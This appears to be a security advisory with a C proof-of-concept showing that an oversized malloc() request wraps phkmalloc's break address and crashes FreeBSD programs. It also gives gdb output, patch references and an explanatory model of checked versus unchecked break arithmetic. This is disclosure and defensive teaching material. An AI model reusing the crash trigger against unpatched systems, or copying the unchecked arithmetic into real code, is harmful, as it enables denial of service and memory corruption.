---[ Description

malloc() (which is actually phkmalloc) can be passed a large argument such that the new break address overflows and the segment size is actually reduced, causing the application to crash anywhere. It would be interesting to know whether this could be used to force an address shrink down to the addresses where the memory info is stored, since that info is not stored in-band as it is in GNU libc's malloc, where in-band metadata allows for easy malloc overwrite exploits.

---[ Test Code

/* proof of concept for phkmalloc bugs */
#include <sys/types.h>   /* u_long */
#include <stdio.h>
#include <stdlib.h>      /* malloc, getenv, exit */
#include <string.h>      /* strlcpy (BSD libc) */
#include <unistd.h>

u_long NFOO  = (80*1024*1024);   /* 80 MB: a legitimate large allocation */
u_long NBAR  = (-80*1024*1024);  /* -80 MB stored unsigned: a huge request that wraps the break */
u_long NSIZE = (8*1024*1024);    /* how much of foo is written after the bad malloc() */

int
main(void)
{
    char *foo, *bar, *shell;
    u_long i;

    foo = malloc(sizeof *foo * NFOO);
    if (!foo) {
        fprintf(stderr, "Allocating foo failed\n");
        exit(-1);
    }

    /* The oversized request: on an unpatched phkmalloc the break
     * arithmetic overflows here (FreeBSD crashes inside malloc()). */
    bar = malloc(sizeof *bar * NBAR);
    if (!bar) {
        fprintf(stderr, "malloc() fails\n");
    }

    /* Print an environment string before and after touching foo, to
     * see whether the shrunken segment has clobbered anything. */
    shell = getenv("SHELL");
    fprintf(stdout, "SHELL: %s\n", shell);

    for (i = 0; i < NSIZE; ++i) {
        strlcpy(foo + i, "0123456789", 11);
    }

    shell = getenv("SHELL");
    fprintf(stdout, "SHELL: %s\n", shell);

    exit(0);
}

** FreeBSD/x86

FreeBSD monyet 4.6-STABLE FreeBSD 4.6-STABLE #0: Fri Aug 9 08:59:35 WIT 2002
    jim@monyet:/usr/src/sys/compile/MONYET  i386

[19:12:02] monyet:~/works/phkmalloc > make CFLAGS="-Wall -g" test
cc -Wall -g  test.c  -o test
[19:12:42] monyet:~/works/phkmalloc > ./test
Segmentation fault (core dumped)
[19:13:13] monyet:~/works/phkmalloc > gdb ./test ./test.core
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd"...
Core was generated by `test'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /usr/lib/libc.so.4...done.
Reading symbols from /usr/libexec/ld-elf.so.1...done.
#0  0x280e0429 in isatty () from /usr/lib/libc.so.4
(gdb) bt
#0  0x280e0429 in isatty () from /usr/lib/libc.so.4
#1  0x280e074d in isatty () from /usr/lib/libc.so.4
#2  0x280e0e65 in malloc () from /usr/lib/libc.so.4
#3  0x80485e6 in main () at test.c:25
#4  0x80484f9 in _start ()
(gdb)

** OpenBSD/x86

OpenBSD 3.2-current (KUTUKUPRET) #1: Fri Jan 24 15:14:06 WIT 2003
    jim@orangutan:/hack/OpenBSD/src/sys/arch/i386/compile/KUTUKUPRET

[7:00:11pm] /hack/labs/fun/malloc > make CFLAGS+="-Wall -g" test
cc -Wall -g -o test test.c
[7:00:12pm] /hack/labs/fun/malloc > ./test
malloc() fails
SHELL: /usr/local/bin/tcsh
SHELL: /usr/local/bin/tcsh

---[ Notes

o OpenBSD already has a sanity check for this, committed on 2003/01/14. See
  http://www.openbsd.org/cgi-bin/cvsweb.cgi/src/lib/libc/stdlib/malloc.c.diff?r1=1.53&r2=1.54

o Poul-Henning Kamp committed a similar patch for FreeBSD on 2003/01/30. See
  http://www.freebsd.org/cgi/cvsweb.cgi/src/lib/libc/stdlib/malloc.c.diff?r1=1.73&r2=1.74
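The overflow described above, and the kind of sanity check the OpenBSD and FreeBSD patches add, are easiest to see on a small model of the break arithmetic. The following is an added example, not phkmalloc's code and not the text of either patch: it models a 32-bit (i386) address space with uint32_t, uses a constructed sample break value and the two request sizes from the test program (80 MB and (u_long)-80 MB), and every function name (model_*) and the 4096-byte page size are assumptions of this model. The unchecked variant shows the break wrapping below its old value (the "segment shrink" the advisory describes); the checked variant refuses such a request instead.

```c
#include <stdint.h>
#include <inttypes.h>
#include <stdio.h>

/* Page size of the i386 systems in the advisory (model assumption). */
#define MODEL_PAGE_SIZE 4096u

/* Round a byte request up to whole pages. Returns 0 if the rounding
 * itself would wrap the 32-bit size, 1 otherwise. */
int model_pages_for(uint32_t request, uint32_t *pages)
{
    if (request > UINT32_MAX - (MODEL_PAGE_SIZE - 1))
        return 0;
    *pages = (request + MODEL_PAGE_SIZE - 1) / MODEL_PAGE_SIZE;
    return 1;
}

/* Naive break extension: cur_brk + request with no check. In a 32-bit
 * address space the sum silently wraps, so a huge request yields a
 * "new" break that lies BELOW the old one: the data segment shrinks
 * instead of growing. This is the condition the advisory triggers. */
uint32_t model_extend_unchecked(uint32_t cur_brk, uint32_t request)
{
    return cur_brk + request;
}

/* Checked break extension, in the spirit of the sanity checks the BSDs
 * committed: refuse any request whose page-rounded size would push the
 * break past the top of the address space (equivalently, require the
 * new break to be strictly greater than the current one). Returns 1 and
 * sets *new_brk on success, 0 on refusal. */
int model_extend_checked(uint32_t cur_brk, uint32_t request, uint32_t *new_brk)
{
    uint32_t pages, bytes;

    if (request == 0 || !model_pages_for(request, &pages))
        return 0;
    bytes = pages * MODEL_PAGE_SIZE;     /* cannot wrap: pages <= UINT32_MAX / MODEL_PAGE_SIZE */
    if (bytes > UINT32_MAX - cur_brk)    /* cur_brk + bytes would wrap */
        return 0;
    *new_brk = cur_brk + bytes;
    return 1;
}

/* Convenience wrapper: the new break on success, 0 when refused
 * (0 is never a valid result since bytes > 0 and no wrap is allowed). */
uint32_t model_try_extend(uint32_t cur_brk, uint32_t request)
{
    uint32_t nb;
    return model_extend_checked(cur_brk, request, &nb) ? nb : 0;
}

/* Constructed sample break for a typical i386 process, plus the two
 * request sizes from the advisory's test program as 32-bit values:
 * NFOO = 80 MB (0x05000000) and NBAR = (u_long)(-80 MB) (0xFB000000). */
#define SAMPLE_BRK  0x08100000u
#define SAMPLE_NFOO (80u * 1024u * 1024u)
#define SAMPLE_NBAR ((uint32_t)(-(80 * 1024 * 1024)))

int main(void)
{
    uint32_t wrapped = model_extend_unchecked(SAMPLE_BRK, SAMPLE_NBAR);

    printf("unchecked: brk 0x%08" PRIx32 " + NBAR 0x%08" PRIx32 " = 0x%08" PRIx32 " (%s)\n",
           SAMPLE_BRK, SAMPLE_NBAR, wrapped,
           wrapped < SAMPLE_BRK ? "segment shrank" : "segment grew");
    printf("checked NFOO: 0x%08" PRIx32 "\n", model_try_extend(SAMPLE_BRK, SAMPLE_NFOO));
    printf("checked NBAR: %s\n",
           model_try_extend(SAMPLE_BRK, SAMPLE_NBAR) ? "accepted" : "refused");
    return 0;
}
```

With the sample break, the unchecked sum for NBAR wraps to 0x03100000, well below 0x08100000, which is exactly the shrink that leaves later accesses pointing outside the mapped segment; the checked path accepts NFOO (new break 0x0D100000) and refuses NBAR before any break is moved.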